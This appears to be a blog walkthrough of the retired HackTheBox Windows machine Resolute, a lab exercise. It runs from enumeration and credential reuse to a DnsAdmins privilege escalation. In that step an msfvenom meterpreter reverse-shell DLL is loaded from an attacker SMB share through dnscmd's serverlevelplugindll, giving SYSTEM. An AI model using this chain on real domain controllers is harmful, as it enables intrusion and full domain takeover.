Posts Hackthebox Resolute writeup
Post
Cancel

Hackthebox Resolute writeup

Introduction@Resolute:~$

ColumnDetails
NameResolute
IP10.10.10.169
Points30
OsWindows
DifficultyMedium
Creatoregre55
Out On7 Dec May 2019
Retired on30 May 2020

Brief@Resolute:~$

Running enum4linux agaainst the box we got some usernames and a password for user marko . After some hit and try we got succed to login as melanie using evil-winrm . After some manual enumeration i got a hidden file in a hidden directory . Which contains credentials of the user ryan . After Switching to ryan we came to know that ryan is in the group of dnsadmin . Crafting a malicious dll file and adding the entry of our dll as the serverplugin and restarting the service we will able to execute our dll as admin.

Summary@Resolute:~$

  • Running enum4linux gives some usernames .
  • Got password for a user marko but that turned out of melanie.
  • Logged in as melanie using evil-winrm
  • Got user.txt
  • Manual enumeration and got some hidden files
  • Got password for user ryan from a file.
  • Switched to ryan
  • User is in the group of dnsadmin
  • Crafting malicious dll file for dll-injection
  • Starting the smb server using impacket smbserver.py
  • Setting up the path for /serverlevelplugindll to my dll
  • Stoping and starting the service dns
  • Got root.txt

Pwned

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
➜  resolute nmap -sC -sV -p- -v -oA scans/nmap-full -T4 resolute.htb
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-29 09:31 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:31
Completed NSE at 09:31, 0.00s elapsed
Initiating NSE at 09:31
Completed NSE at 09:31, 0.00s elapsed
Initiating Ping Scan at 09:31
Scanning resolute.htb (10.10.10.169) [4 ports]
Completed Ping Scan at 09:31, 0.59s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:31
Scanning resolute.htb (10.10.10.169) [65535 ports]
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 139/tcp on 10.10.10.169
Discovered open port 135/tcp on 10.10.10.169
Discovered open port 53/tcp on 10.10.10.169
Discovered open port 49677/tcp on 10.10.10.169
NSE: Script scanning 10.10.10.169.
Initiating NSE at 09:52
Completed NSE at 09:54, 121.80s elapsed
Initiating NSE at 09:54
Completed NSE at 09:54, 1.93s elapsed
Nmap scan report for resolute.htb (10.10.10.169)
Host is up (0.36s latency).
Not shown: 65510 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-29 04:29:54Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49684/tcp open  msrpc        Microsoft Windows RPC
49712/tcp open  msrpc        Microsoft Windows RPC
64798/tcp open  tcpwrapped
64974/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=5/29%Time=5ED11327%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -7h00m31s, deviation: 4h02m32s, median: -9h20m33s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-05-28T21:32:12-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-05-29 00:32:10
|_  start_date: 2020-05-28 18:33:16

NSE: Script Post-scanning.
Initiating NSE at 09:54
Completed NSE at 09:54, 0.00s elapsed
Initiating NSE at 09:54
Completed NSE at 09:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1372.93 seconds
           Raw packets sent: 72795 (3.203MB) | Rcvd: 69585 (2.784MB)

Woo So many ports and services are opened ……

Enum4linux

Better if i run a enum4linux for some juicy information so lets do it….

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
➜  prashant enum4linux resolute.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat May 30 07:44:42 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... resolute.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on resolute.htb    |
 ==================================================== 
[E] Cant find workgroup/domain


 ============================================ 
|    Nbtstat Information for resolute.htb    |
 ============================================ 
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
Looking up status of 10.10.10.169
No reply from 10.10.10.169

As i thought i got everything that can lead to the next steps

Userslist

I got some valid usernames (Interesting)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]

And one more very interesting thing i got the password of the user marko

1
2
3
4
 ============================= 
|    Users on resolute.htb    |
 ============================= 
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko	Name: Marko Novak	Desc: Account created. Password set to Welcome123!

So i used evil-winrm using user marko and pass Welcome123!

1
2
3
4
5
6
7
8
9
  prashant evil-winrm -u marko -p  Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

Thats just turned out to be a wrong password…..

Login as melanie

I could also use metasploit-module called winrm_login which will just bruteforce the usernames with the password we have . But to be honest i guessed the username , You can check the below article for further things .

https://www.rapid7.com/db/modules/auxiliary/scanner/winrm/winrm_login

And an error of authorization here it means creds are wrong.Then i just tried with other users with the same password And got success with the user melanie

1
2
3
4
5
6
7
  prashant evil-winrm -u melanie -p  Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> 

Without wasting any time i grabbed the user flag

Got user.txt

1
2
3
*Evil-WinRM* PS C:\Users\melanie\Desktop> cat user.txt
0c3be45f--------------------8540
*Evil-WinRM* PS C:\Users\melanie\Desktop> 

Now its time for root

Enumeration

After some manual enumeration i got a hidden dir called PSTranscripts

I just moved to dir \ and performed a dir list for hidden dir too using dir -force

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
*Evil-WinRM* PS C:\> dir -force
    Directory: C:\
Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN                                                                                                                                                                                            
d--hsl        9/25/2019  10:17 AM                Documents and Settings                                                                                                                                                                                  
d-----        9/25/2019   6:19 AM                PerfLogs                                                                                                                                                                                                
d-r---        9/25/2019  12:39 PM                Program Files                                                                                                                                                                                           
d-----       11/20/2016   6:36 PM                Program Files (x86)                                                                                                                                                                                     
d--h--        9/25/2019  10:48 AM                ProgramData                                                                                                                                                                                             
d--h--        12/3/2019   6:32 AM                PSTranscripts                                                                                                                                                                                           
d--hs-        9/25/2019  10:17 AM                Recovery                                                                                                                                                                                                
d--hs-        9/25/2019   6:25 AM                System Volume Information                                                                                                                                                                               
d-r---        12/4/2019   2:46 AM                Users                                                                                                                                                                                                   
d-----        12/4/2019   5:15 AM                Windows                                                                                                                                                                                                 
-arhs-       11/20/2016   5:59 PM         389408 bootmgr                                                                                                                                                                                                 
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT                                                                                                                                                                                                 
-a-hs-         2/8/2020   8:22 PM      402653184 pagefile.sys                                                                                                                                                                                            

*Evil-WinRM* PS C:\> 

And got a dir called PSTranscripts

1
2
3
4
5
6
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force
    Directory: C:\PSTranscripts\20191203
Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-arh--        12/3/2019   6:45 AM           3732 
 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt                                                                       

And we got a file called PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
*Evil-WinRM* PS C:\PSTranscripts\20191203> cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************

And the most interesting thing there is a password of user ryan

  • cmd /c net use X: \fs01\backups ryan Serv3r4Admin4cc123!

And the password is Serv3r4Admin4cc123! Yay…….!!!

Using evil-winrm i logged in as ryan

1
2
3
4
5
6
7
  prashant evil-winrm -i resolute.htb -u ryan -p Serv3r4Admin4cc123!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ryan\Documents> 

Privilege Escalation

For checking what privileges i have i can check it with whoami

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
                                                            

From the line we can conclude that the user ryan is in dnsadmin group

1
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group

From now i have something o which i can focus , I got a article after some research

https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise

Now i created a malicious dll file using msfvenom which will give me a meterpreter shell

1
2
3
4
5
6
➜  prashant msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=5678 -f dll > saini.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 5120 bytes

And now i moved the saini.dll to the machine using iwr

1
*Evil-WinRM* PS C:\tmp> iwr -uri http://10.10.14.4/saini.dll -o saini.dll

And its bees downloaded

1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\tmp> ls


    Directory: C:\tmp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/29/2020  10:48 PM           5120 saini.dll

But doing ls another time the dll file is gone . So i can confirm that Anti - Virus is running or Real - time Protection .

1
2
*Evil-WinRM* PS C:\tmp> ls
*Evil-WinRM* PS C:\tmp> 

I will be using smb service to get rid of AV that is also mentioned in the article

So i used impacket smbserver.py for a quick setup of my smb service

And started smbserver to bypass the av protection on the machine

1
2
3
4
5
6
7
8
9
➜  prashant python /usr/share/doc/python-impacket/examples/smbserver.py -smb2support public .     
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Hack - Steps

What i am going to do is setting the serverlevelplugindll to my malicious dll .

1
dnscmd  /config /serverlevelplugindll \\10.10.14.4\public\saini.dll

And Then i need to stop the service dns and then start it again so that when the service start again the dns service will look for the serverplugin and since we have set that plugin to my dll file , So it will execute my file and we will get a shell for sure.

Setting the serverlevelplugindll to my file

1
2
3
4
5
6
*Evil-WinRM* PS C:\tmp> dnscmd  /config /serverlevelplugindll \\10.10.14.4\public\saini.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\tmp>

Stopping the service

1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\tmp> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\tmp>

Starting the service

1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\tmp> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3948
        FLAGS              :
*Evil-WinRM* PS C:\tmp>

Got a meterpreter shell

1
2
3
4
5
6
7
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.4:5678 
[*] Sending stage (206403 bytes) to 10.10.10.169
[*] Meterpreter session 3 opened (10.10.14.4:5678 -> 10.10.10.169:60148) at 2020-05-30 11:20:31 -0400

meterpreter > 

Got shell as administrator

Better if we just spawn a shell

1
2
3
4
5
6
7
8
9
meterpreter > shell
Process 1908 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami 
whoami
nt authority\system

Got root.txt

1
2
3
C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1d---------------------------19c

And we pwned it …….

If u liked the writeup.Support a Poor Student to Get the OSCP-Cert Donation for OSCP

If you want to get notified as soon as i upload something new to my blog So just click on the bell icon you are seeing on the right side – > and allow push notification

Resources

TopicUrl
Dnsadmin Priv eschttps://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise
Updated Jun 17, 2020 2020-06-17T07:03:57+00:00
This post is licensed under CC BY 4.0

© 2020 Prashant Saini. All rights reserved.